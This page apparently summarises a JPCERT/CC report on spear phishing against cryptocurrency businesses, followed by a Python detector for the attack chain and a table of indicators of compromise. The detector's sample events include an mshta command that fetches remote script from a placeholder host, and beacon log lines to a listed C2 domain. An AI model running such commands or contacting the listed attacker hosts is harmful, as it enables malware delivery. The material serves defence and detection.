Spear Phishing against Cryptocurrency Businesses
2019-07-09 • JPCERT
https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html
JPCERT/CC observed targeted phishing emails against Japanese organizations, especially cryptocurrency-related entities, that delivered a ZIP file containing a password-protected decoy document and a malicious shortcut named “Password.txt.lnk”. The shortcut launched mshta to retrieve VBScript from a shortened URL, showed the decoy password to the user, wrote a downloader in the temporary directory, and created a Startup-folder shortcut for persistence when none of a set of security-product process names was running. The downloader sent POST requests every three minutes and executed the VBScript returned, while a later script collected infected-device information every minute and could receive additional encoded payloads. Infrastructure included service.amzonnews.club and update.gdrives.top, with multiple sample hashes and related C2 servers listed in appendices. The limited access counts and cryptocurrency-themed decoys indicate a narrow, customized campaign rather than broad commodity delivery.
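The chain summarised above has three observable stages a defender can hunt for: mshta.exe being handed a remote URL, a .lnk being written to the Startup folder, and a POST beacon on a fixed three-minute interval. The following Python is an added example written for this page (not JPCERT/CC's code) that implements those three checks over constructed Sysmon-style process and file events and constructed proxy-log lines; the `example.invalid` hosts and the `/PLACEHOLDER` path are assumptions, and only the domain update.gdrives.top comes from the report.

```python
"""Detection checks for the infection chain described above.
All events and log lines here are constructed for the example."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# --- Stage 1: mshta.exe invoked with a remote (http/https) target ---------
# Constructed process-creation events (Sysmon Event ID 1 style, simplified).
PROCESS_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    # shortcut-launched mshta pulling script from a shortened URL (placeholder host)
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'mshta.exe "https://short.example.invalid/abc"'},
    # local HTA launched by an installer: benign, should not be flagged
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Temp\setup.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def mshta_remote_content(events):
    """Return command lines where mshta.exe is given an http(s) URL to execute."""
    return [ev["cmdline"] for ev in events
            if ev["image"].lower().endswith("\\mshta.exe") and REMOTE_URL.search(ev["cmdline"])]

# --- Stage 2: shortcut written into the per-user Startup folder -----------
# Constructed file-creation events (Sysmon Event ID 11 style, simplified).
FILE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"image": r"C:\Windows\explorer.exe", "target": r"C:\Users\alice\Desktop\notes.txt"},
]
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)

def startup_shortcut_writes(events):
    """Return paths of .lnk files created directly in a Startup folder."""
    return [ev["target"] for ev in events if STARTUP_LNK.search(ev["target"])]

# --- Stage 3: fixed-interval POST beacon -----------------------------------
# Constructed proxy log: "<timestamp> <src-ip> <method> <url> <status>".
# The beacon lines use the report's update.gdrives.top; the path is a placeholder.
PROXY_LOG = [
    "2019-07-09T10:00:00 10.0.0.5 POST http://update.gdrives.top:8080/PLACEHOLDER 200",
    "2019-07-09T10:03:01 10.0.0.5 POST http://update.gdrives.top:8080/PLACEHOLDER 200",
    "2019-07-09T10:05:59 10.0.0.5 POST http://update.gdrives.top:8080/PLACEHOLDER 200",
    "2019-07-09T10:09:00 10.0.0.5 POST http://update.gdrives.top:8080/PLACEHOLDER 200",
    "2019-07-09T10:12:02 10.0.0.5 POST http://update.gdrives.top:8080/PLACEHOLDER 200",
    # ordinary webmail traffic: bursty, irregular gaps, should not be flagged
    "2019-07-09T10:00:30 10.0.0.5 POST https://mail.example.invalid/sync 200",
    "2019-07-09T10:00:41 10.0.0.5 POST https://mail.example.invalid/sync 200",
    "2019-07-09T10:07:12 10.0.0.5 POST https://mail.example.invalid/sync 200",
    "2019-07-09T10:07:13 10.0.0.5 POST https://mail.example.invalid/sync 200",
]
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d+)$")

def find_beacons(lines, expected_gap=180, min_hits=4, max_cv=0.05):
    """Flag (src, host) pairs whose POST timestamps recur at a near-constant
    interval close to expected_gap seconds (180 s = the reported 3 minutes).
    A low coefficient of variation (stdev/mean) distinguishes a timer from
    human-driven traffic."""
    by_host = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the scan
        ts, src, method, url, _status = m.groups()
        if method != "POST":
            continue
        host = url.split("/")[2]  # scheme://host[:port]/path -> host[:port]
        by_host[(src, host)].append(datetime.fromisoformat(ts))
    findings = []
    for (src, host), stamps in by_host.items():
        stamps.sort()
        if len(stamps) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv and abs(avg - expected_gap) <= 0.1 * expected_gap:
            findings.append({"src": src, "host": host,
                             "count": len(stamps), "mean_gap": round(avg, 1)})
    return findings

if __name__ == "__main__":
    print("mshta with remote URL:", mshta_remote_content(PROCESS_EVENTS))
    print("Startup .lnk writes:  ", startup_shortcut_writes(FILE_EVENTS))
    print("Beacons:              ", find_beacons(PROXY_LOG))
```

The beacon check deliberately keys on timing regularity rather than on the listed domains, so it still fires when the operators rotate infrastructure; the IoC table below is the complementary, exact-match layer. Tune `max_cv` upward if the environment adds proxy queueing jitter, and keep `min_hits` at four or more so that two coincidental requests never produce an alert.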
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | googledrive.publicvm.com | 2019-07-09 | 2022-01-13 |
| DOMAIN | mskpupdate.publicvm.com | 2019-07-09 | 2021-05-24 |
| DOMAIN | drivegoogle.publicvm.com | 2019-07-09 | 2021-05-24 |
| DOMAIN | mdown.showprice.xyz | 2019-07-09 | 2021-01-28 |
| IPv4 | 75.133.9.84 | 2019-07-09 | 2021-01-28 |
| HASH | 1533374acf886bc3015c4cba3da1c67… | 2019-07-09 | 2020-08-18 |
| HASH | a464781b616c86bbd68dbf909826444… | 2019-07-09 | 2020-08-18 |
| HASH | 997c4f7695a6a615da069d5f839582f… | 2019-07-09 | 2020-08-18 |
| HASH | 7446efa798cfa7908e78e7fb2bf3ac5… | 2019-07-09 | 2020-08-18 |
| DOMAIN | gbackup.gogleshare.xyz | 2019-07-09 | 2020-08-18 |
| DOMAIN | eu.euprotect.net | 2019-07-09 | 2020-08-18 |
| DOMAIN | drive.gogleshare.xyz | 2019-07-09 | 2020-08-18 |
| DOMAIN | download.showprice.xyz | 2019-07-09 | 2020-08-18 |
| DOMAIN | googldocs.org | 2019-07-09 | 2020-08-18 |
| DOMAIN | drverify.dns-cloud.net | 2019-07-09 | 2020-08-18 |
| DOMAIN | europasec.dnsabr.com | 2019-07-09 | 2020-08-18 |
| DOMAIN | start.showprice.xyz | 2019-07-09 | 2020-05-06 |
| DOMAIN | iellsfileshare.sharedrivegght.x… | 2019-07-09 | 2020-05-06 |
| DOMAIN | docs.googlefiledrive.com | 2019-07-09 | 2020-05-06 |
| HASH | b077edc8d08796cdff8b75e5cb66e01… | 2019-07-09 | 2019-07-09 |
| HASH | c60aedbb20fdea048fa2d4b3bdc520f… | 2019-07-09 | 2019-07-09 |
| HASH | 9b20767b11f7e54644104d455aa25c6… | 2019-07-09 | 2019-07-09 |
| HASH | f9e299c562195513968be88c6096957… | 2019-07-09 | 2019-07-09 |
| HASH | 7dcbeb1806296739acfa5819872e8d9… | 2019-07-09 | 2019-07-09 |
| HASH | 01b5cd525d18e28177924d8a7805c20… | 2019-07-09 | 2019-07-09 |
| HASH | dc5f81c5bf0f5905ff2b6bdc4e1171f… | 2019-07-09 | 2019-07-09 |
| HASH | e982a70cb21c915d847925bd364d6d8… | 2019-07-09 | 2019-07-09 |
| HASH | 10ce173cfe83321b44139e3d7d20c5a… | 2019-07-09 | 2019-07-09 |
| HASH | 57278dab6a0e8438444996503a6528f… | 2019-07-09 | 2019-07-09 |
| HASH | 71346d2cb7ecf45d7fe221ede76da51… | 2019-07-09 | 2019-07-09 |
| HASH | 4ecab0f81a2da70df5f2260bab7c8c1… | 2019-07-09 | 2019-07-09 |
| HASH | de7fde10fabf91c03cdd894e40a19e6… | 2019-07-09 | 2019-07-09 |
| HASH | 9ad472872ba20c66fad56b7340ae869… | 2019-07-09 | 2019-07-09 |
| HASH | d70988e43ebc4981e880489b11b6c37… | 2019-07-09 | 2019-07-09 |
| HASH | 901eca85c5711a53e53c48309b3afd3… | 2019-07-09 | 2019-07-09 |
| HASH | 122674a261ac7061c8a304f3e4a1fb1… | 2019-07-09 | 2019-07-09 |
| URL | http://update.gdrives.top:8080/… | 2019-07-09 | 2019-07-09 |
| URL | http://service.amzonnews.club:8… | 2019-07-09 | 2019-07-09 |
| DOMAIN | downs.showprice.xyz | 2019-07-09 | 2019-07-09 |
| DOMAIN | service.amzonnews.club | 2019-07-09 | 2019-07-09 |
| DOMAIN | update.gdrives.top | 2019-07-09 | 2019-07-09 |
| DOMAIN | u13580130.ct.sendgrid.net | 2019-07-09 | 2019-07-09 |